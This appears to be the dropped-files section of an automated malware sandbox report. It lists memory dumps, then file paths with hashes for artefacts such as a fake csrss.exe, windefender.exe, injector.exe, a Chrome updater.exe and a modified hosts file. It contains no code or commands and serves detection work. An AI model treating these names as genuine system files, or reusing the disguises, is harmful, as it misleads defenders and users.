memory/4996-193-0x00000000030F0000-0x00000000039DB000-memory.dmp

memory/3712-200-0x00000000008E0000-0x0000000001088000-memory.dmp

memory/940-188-0x00000000076B0000-0x00000000077BA000-memory.dmp

memory/1088-201-0x0000000007F00000-0x0000000007F10000-memory.dmp

memory/2112-163-0x00000000020F0000-0x000000000218B000-memory.dmp

memory/4996-202-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/1088-205-0x00000000088E0000-0x0000000008946000-memory.dmp

memory/4996-206-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/940-207-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/952-209-0x0000000005470000-0x0000000005480000-memory.dmp

memory/952-208-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/952-210-0x00000000053E0000-0x0000000005416000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nihrsyua.ael.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Roaming\rdfuthe

MD5 a6cc2635415872e2cfa5bc586b8d5ac1
SHA1 1ab7f97be976876998982fef5a4f54f29325ff10
SHA256 2c7f187a9372f97c7cb6cdc8143a832d2790188bf194f251460ac990b9074d5e
SHA512 cdf59bea2bfc872b8b39d5553c9b91292afcd73e3c9bf7a95ce14734052e6718cbc6379358447b115dbd2967ad3bd933e135b7e7c40d98ddaca7f50c1ac0f7ad

memory/4996-262-0x0000000000400000-0x0000000000D6F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 b3b4060b6ca706ed5c0c50f603c8dd6e
SHA1 38ac281e1502d4da29bb852d3fbdce519ca78651
SHA256 12900fc1b9b68c29f56f01d75e68df2418672eb5f0464fea24f7fe041d7d2b09
SHA512 ca7e93b1fad41938ce146fbec7128d44dbdf3662ff866471cc315bef53561bdd8f3383584b45ed1705b37818c8df228d2fc2221fe7508dbd166a2fccdf1062ab

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 1b74622e8ab19add38f77108668ab0d3
SHA1 44f55fd86a7dac45ba9be3ccc93ca8506ac44971
SHA256 95c147385128ab72e7c19aeda013dae4cba31d6efafe74b7005638c3399e7bba
SHA512 abd4b99ccf7b7a94dd518f226ca20acc41879b89d07f1221b625be6bdbe1b664ab9cfcd8b7b7f80f23fa1fc8d1510f19196153d7701b3c79faa3fe230ae2ebde

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

MD5 c671d50d589ce7be9ad3ff4035e6ad63
SHA1 88cdc154077c8264149cb8b19e16ba07901e1dd6
SHA256 fb07948cb75ee2b9967b1a6386eb53a46573ae99c9ecb46f2b377af8df1b7568
SHA512 a40a7500a7896f2200754499c00e74a7b8a53578808d5408e1e31733d03cdeb2b3e520c1d9b71537f2877093b686811b8e20cbb5c8061e4d3e1d75a161cebae9

memory/1920-278-0x00007FF69A720000-0x00007FF69B900000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6042.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 34e51362210c5e9637bdb3d79c1761a4
SHA1 e41e2665d0e167ef02fb6dfe1acf3f74ec7b7a22
SHA256 72e0ebc9aa037086f593593d065068d8d442a2ba31ee61ad44071edd9eec4f12
SHA512 8298476271fc8c28151e2b6d20512fd173e0bc442c9a6358cadb7bbfaa0e61e4c403b664de173f5de753a6b0ac52ad57dcfb26bfe21ad548204934835ca0f410

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 644cb78cc77fb14a04661ed8a7c3d196
SHA1 87b52f21c8cdf9cbb4929ffe220ad9ca0a337f8c
SHA256 d0bfdf475fa2de548707e2753d606bcd8c9ce5023f612cd20e6f49e2a46bcf3b
SHA512 6649ee7d70461dd5eb0a276b18bb19149e5ab488683d4f6db6dfd6dff299dd30602dc65eb20d9a7b36deb9b5a56062c71bd556077d41376c62c43a9f514d86f0

C:\Users\Admin\AppData\Local\Temp\xulltjniharo.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 88f5524e7db51aa117a84d205c254bab
SHA1 e95e54335687b4331d8930be520455cda5ca8269
SHA256 65ed690d585cfd413fc79e3a05eb87468b6d9c3929d887f537dbd86532cec4b8
SHA512 89a78a0d0b1d7f23a871cbb465a5f8d0d8a376b7e1998417d7448fb15601a0e0fede159e310870fd13b502cedfbd31a58073be6331918b67e9ccab5ce17fc93c

C:\Program Files\Google\Chrome\updater.exe

MD5 92be6def85e16d9c154b5d8829d615d6
SHA1 614a314b55831e15ad29ff46312f44ea1399ccac
SHA256 98fb516048c35cbe84d1a31536650f1caca5952702f0189c8f3f72a21a561b1d
SHA512 f09d0b4b4e4f1effa5f2735305fb4e1c95669d29b850b4f97e0e2b2688c4d077c2460e61feb50a68526f0a68aff2f5c24ad7deaa4a637703d301cae707f1bdd6

C:\Windows\rss\csrss.exe

MD5 a50ebdc8e7bb60a4686fffa9323ad61f
SHA1 1302b28d7cfb7eb2969678b1c02a44280f471666
SHA256 24053ca4496a6d4ed35da7d868cc912f583c268828f2d739ff93f41a0024d3e6
SHA512 270c34c8618b12bf50f18d75fa091642e32c47f72884b2dec24e939c415e1992c56223f17ebdfecedc1b4a5be3b2ff457d961aa300a2f8a722beef231ed5e806

C:\Windows\rss\csrss.exe

MD5 30ee18cdea6b54405adc18c511eb88e6
SHA1 935c00aebea3b21362fd7de3ef8b7b5b2a9b6438
SHA256 4f1c2f2b86b50e4bed35c9e6a31fd2dcfa57512c7bb951398913d61512e02901
SHA512 2b30087e1f057096b1b6a3c6d31d2d8d7fcfa3a65d5feb6d5c8bb1769116f260867090db5e43e54d800463e3a705c73669e909b10619eb6a6d4e936b97d30930

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 58f17ae0fe2534b1e3594e707f4e1223
SHA1 3c0c013546b7d64ad40aedb606f180b7007955ef
SHA256 46e547e7d26c48a3a4425cd8cb312ce1f3550e6bbfe02b00aa0d16b56010bab8
SHA512 8b3999b64e7e30f0b71428649df286b38bc7c447b303b593fa4283a7e8f29e1a8f8b7d1d74c1cb40a9f274a5c5174f2df14e302a1fc325125d6bf8302c17cce3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b54391da243b08c4a71dd8544328904a
SHA1 09e2353309a1c1afc870ea35e716658a0d24e61d
SHA256 ca6eb01f279ab508343bddd1a3590c997d44f6eef734d93632bb6008bcc16ef4
SHA512 dac13055d86207193adc8f1ad6b6328a9e9b8ca9dc5c63a57a18abb385741058d05870386b5bc9a0c71135d9c6123c695b937eaaf96399635f1470021b44386c

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 9d3d68839e55d7a29c96c908494381c4
SHA1 9722613339047420b3750e82f9383c472a98c2c0
SHA256 d1ed4a9d31729c487c183577e995404808950075ce678ede7bc59c885bed8932
SHA512 72c9925bd5ec65ac9555b32cba89a961414292be1f332eb9c1a23adff097b53bfaf569718188346e937be3e7f1e25b0d950a76359c87bcec2640aba24bae29fd

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Program Files\Google\Chrome\updater.exe

MD5 e4f1282f1ca878460ae7048c74841b7c
SHA1 6b468521447c316891b7e22dd5790e1526ea7934
SHA256 4b64bccaf78060bde8b10ffa688719d419f6730237a7328287e02435ad88a333
SHA512 35c95fdf45286f0d7021c91f160ae72ea26e57a344d0249e25b71f024003ceac74bac341d9e423ea5614bd24c87f3056d04d10cb6521c5234d434043f8204dde

C:\Windows\TEMP\xulltjniharo.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Windows\System32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Windows\windefender.exe

MD5 ddb8715f6846ef241fa1dfb8e60e9743
SHA1 a818046c8fb726fbf9b1fce6b3d8d519159a78de
SHA256 e5da747d299dbde90d2bd9af07fa29c405f9b5b8648182ac6c5608c0c3a641c5
SHA512 3e21352add4afebd54939c095b74ce2ba19893e571c4dec619624620d597efebe7559423af3109d01bceaa61447052e3cd8c1b4aeb83629f68a4001c88f8fa7d

C:\Windows\windefender.exe

MD5 ddb8715f6846ef241fa1dfb8e60e9743
SHA1 a818046c8fb726fbf9b1fce6b3d8d519159a78de
SHA256 e5da747d299dbde90d2bd9af07fa29c405f9b5b8648182ac6c5608c0c3a641c5
SHA512 3e21352add4afebd54939c095b74ce2ba19893e571c4dec619624620d597efebe7559423af3109d01bceaa61447052e3cd8c1b4aeb83629f68a4001c88f8fa7d

C:\Windows\windefender.exe

MD5 c867a746868de73337e2ff276281b394
SHA1 718899329ae7a66b95d9f25d28ef543ed5bcc14a
SHA256 8017c1eef3bb8245af96b80eb7783b514a8961d9577c964ec23204509eb921e6
SHA512 c52adc2e410572db52f94b53a583e4f59c948db962591cb42e5ab28d24d3c5885b7cd76b2816b5f39bae2067286227a2ca0bc1fab8706abdf8bc59c22c251691